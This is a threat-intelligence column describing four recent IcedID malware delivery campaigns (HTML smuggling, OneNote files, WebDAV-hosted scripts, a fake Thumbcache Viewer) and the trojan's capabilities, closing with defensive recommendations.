IcedID: Exploring Four Recent Malware Infection Techniques

Written by

In today’s evolving threat landscape, security teams must always be on their toes.

Effective protection is not simply a case of addressing a handful of vulnerabilities and countering half a dozen common attack methods. From DDoS, ransomware and SQL injection attacks to DNS spoofing, zero-day exploits and session hijacking, organizations need to be hyper-aware and capable of combating an ever-growing list of convincing and sophisticated techniques that attackers are developing. 

Today, any single piece of malware can be deployed in many ways.

In the case of IcedID, a modular trojan first uncovered in 2017 and now one of the most notorious pieces of malware, threat actors can launch campaigns underpinned by a range of infection techniques. 

This is precisely what the Menlo Labs team has seen in recent months, observing four overlapping campaigns. With the IcedID attack chain involving a multi-stage process, phishing emails, fake Zoom installers, malicious .one files, and malvertising campaigns are all plausible infection methods that can ultimately direct victims towards websites hosting malicious payloads in the form of OneNote files, JavaScript files, visual basic script (VBS) files and executables (EXEs).

In this latest column, we will dive deep into the four IcedID campaigns observed by Menlo Labs, considering their differences and ultimate goals.

1. HTML Smuggling Campaigns (October 2022)

In October 2022, we observed the use of HTML smuggling among threat actors to execute IcedID, the malware being delivered to potential victims via an email attachment that, if opened, would prompt the downloading of a password-protected zip file carrying a malicious ISO file.

For context, some reports have claimed that IcedID is exclusively being used by the Quantum Ransomware gang (previously also going by MountLocker, AstroLockers and XingLocker) that former Conti members created.

2. OneNote Campaign (December 2022)

A couple of months later, the team encountered the use of IcedID in a malvertising campaign leveraging Google pay-per-click ads to direct victims to malicious domains containing infection scripts.

This campaign also leveraged search engine optimization (SEO) poisoning to manipulate the website content and code of compromised domains to raise rankings on search engine results pages. 

It’s a form of Legacy URL Reputation Evasive (LURE) designed to improve the perceived legitimacy of malicious webpages, enabling threat actors to better catch unsuspecting victims out while also evading detection through a combination of technical and social engineering tactics.

3. WebDAV Protocol Campaign (December 2022)

In the same month, an additional IcedID campaign was uncovered that was working to exploit the file-sharing capabilities of Microsoft OneNote. In this particular instance, threat actors were found to be uploading scripts, EXEs, documents and other malicious files to OneNote pages before sharing the documents with potential targets. If these were opened, malicious files would, in turn, be downloaded unknowingly, bypassing traditional detection engines such as anti-virus software that tend to list OneNote as being safe. 

The team also found a second, similar campaign in February 2023, this using.url files to retrieve a .bat file from an open directory Web Distributed Authoring and Versioning (WebDAV) file server. Here, the aim was to compromise HTTP protocol extensions and fetch and execute the malware, with the threat actors able to modify files stored on the remote web server.

4. Thumbcache Viewer Campaign (March 2023)

In March 2023, a number of sophisticated campaigns were observed that disguised the malware as a ‘Thumbcache Viewer.’ Here, users would be prompted by a user account control pop-up from Windows asking them if they are happy for the app, disguised as the Thumbcache Viewer, to make changes to their PC. 

Specifically, the program name was listed as: “Thumbcache Viewer is a forensics tool that helps to analyze the contents of thumbcache database files.” If victims selected yes in response to the pop-up, the malware would be executed. 

Threat Actors Can Use IcedID in Several Ways

It is not just the range of convincing and seamless techniques that threat actors can call upon to deploy IcedID that is a danger. Equally, if the malware is successfully loaded onto a victim’s system, it can wreak havoc in various ways.

IcedID is incredibly versatile. It can be used to carry out a variety of nefarious activities before any security measures can intervene, such as:

  • Modifying browser settings
  • Injecting malicious content into legitimate web pages
  • Harvesting stored browser credentials
  • Injecting scripts into existing processes to communicate with threat actor-led C2 servers
  • Downloading additional payloads, such as those capable of invoking ransomware attacks
  • Stealing sensitive information, such as stored passwords
  • Taking screenshots of user activity
  • Recording keystrokes for potential password theft
  • Disabling security products, like anti-virus software or firewalls 

For organizations, visibility over such threats is vital. Indeed, firms must prioritize investing in suitable security solutions, ideally combining secure access secure edge (SASE) frameworks with the tools, policies and attitudes required to strengthen a zero trust approach. 

In doing so, they will be able to ensure that all content is subject to inspection and enterprise security controls, developing a securing setup that is both preventative and addresses the issues associated with many legacy security tools that are no longer fit for modern environments. 

What’s hot on Infosecurity Magazine?